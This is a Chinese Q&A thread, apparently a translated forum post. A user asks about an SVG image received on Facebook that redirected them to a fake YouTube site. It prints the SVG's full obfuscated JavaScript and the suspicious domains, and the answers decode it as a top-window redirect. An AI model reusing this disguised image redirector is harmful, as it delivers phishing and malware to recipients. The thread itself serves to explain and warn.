我收到了带有两个文件(SVG 图片)的 Facebook 消息,我点击了其中一个(我不知道为什么:( )。然后打开了带有红点的新选项卡,然后我立即被重定向到某个网站,假装看起来像Youtube (
http://kerman.pw/?fb_dsa
).
然后我使用“链接另存为...”功能下载了 .svg 文件。 似乎是一些嵌入到 svg 中的 javascript 代码,所以我将其发布在这里(我不太了解 JS):
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" xmlns="http://www.w3.org/2000/svg">
<circle cx="250" cy="250" r="50" fill="red" />
<script type="text/javascript"><![CDATA[
function xcxxy(gyqbv,hzrgh,ktjrf){
var qixua = "XY_/3cU.ioGJkP2hgveS1Tj75ABb=Nrs:u?fKmdI0nLty84CRpVOzaFD9lZExMH6";
var vyqsvo = ["rYf=3vXU:zitl17N.k24ah8ZO6KoDFjPMEceRmsTGbdVBH59uJS\/I0g_CL?pxAyn","RN?dh38MCU0o6u=tIXPp.nZJzc5D:TiLFOvYfjG4E2K1A_rgaHykbS\/9lB7sexVm","n4mAObK9zBt_YZrcE1JHM.SF=dRT:6aDeUuIPi2vfhkGXp?y5LgVoCj0873lxN\/s","C981S?moMiHktu:nev0ZBzVh.2FONIcbxf7GYL6RgpUTAP4j_DJl\/dKa35rsX=Ey","9n?SGiTY6z8BjCbM:Lpsr0xZeUvPaH.JmfudtlE1\/y=kFODRKN24c5oX37_hAIVg",":z2oNO?Tr=aIx8.6gVeRn4_vYE5f1mZAXKltbuU7ByDSMis0Fk\/Pjch3CGLHJd9p"];
var bnkdip = "";
var igrqm = 0;
while(vyqsvo[igrqm]){
igrqm++;
}
var kwwtmh = 0;
while(gyqbv[kwwtmh]){
var jikaig = 0;
var axfnq = -1;
while(qixua[jikaig]){
if(qixua[jikaig] == gyqbv[kwwtmh]){
axfnq = jikaig;
break;
}
jikaig++;
}
if(axfnq >= 0){
var abxnk = 0;
var wjtfca = -1;
while(vyqsvo[kwwtmh%igrqm][abxnk]){
if(vyqsvo[kwwtmh%igrqm][abxnk] == gyqbv[kwwtmh]){
wjtfca = abxnk;
break;
}
abxnk++;
}
bnkdip += qixua[wjtfca];
}else{
bnkdip += gyqbv[kwwtmh];
}
kwwtmh++;
}
var evhrt = "";
for(izqfrv=hzrgh;izqfrv<bnkdip.length;izqfrv++){
evhrt += bnkdip[izqfrv];
}
bnkdip = evhrt;
return bnkdip;
}
var obejok = window;
var iyysri = xcxxy("sUTA:Gkb106SzH",11,false);
var leizjp = xcxxy("kBB?5S:Uh",1,false);
var nvanw = xcxxy(".Pi/MksB2n7jIta0d",13,false);
obejok[iyysri][leizjp][nvanw] = xcxxy("siqnkSJFA1l=Eiz6YOzjADMk=1afJSUHcD",3,false);
]]></script>
</svg>
我不太懂javascript,我想问一下它能做什么。它会伤害我吗? 非常感谢你
您是正确的,SVG 文件嵌入了 javascript。 SVG 是矢量图形文件,它将根据文件内的说明在浏览器中绘制图像。 您发现的 SVG 包含混淆的 JavaScript,以隐藏实际发生的情况。
从我所看到的来看,它是一个打开新浏览器窗口并加载新 URL 的脚本,因此它本身并不危险,这完全取决于它将您重定向到哪个网站以及哪些脚本当您访问网站时,将开始。
简而言之,假设您被重定向到的网站是恶意的,它可能会损害您的计算机。
希望有帮助。
嵌入的脚本会将您的浏览器重定向到网站 http://mourid.com/php/trust.php,但脚本本身并不是恶意的。函数
xcxxy
解码混淆的字符串,最后一行代码是 window["top"]["location"]["href"] = "http://mourid.com/php/trust.php"
的混淆版本,它将您重定向到该站点。我建议您不要运行该脚本,因为有时会使用混淆来隐藏恶意代码。 (来源:维基百科)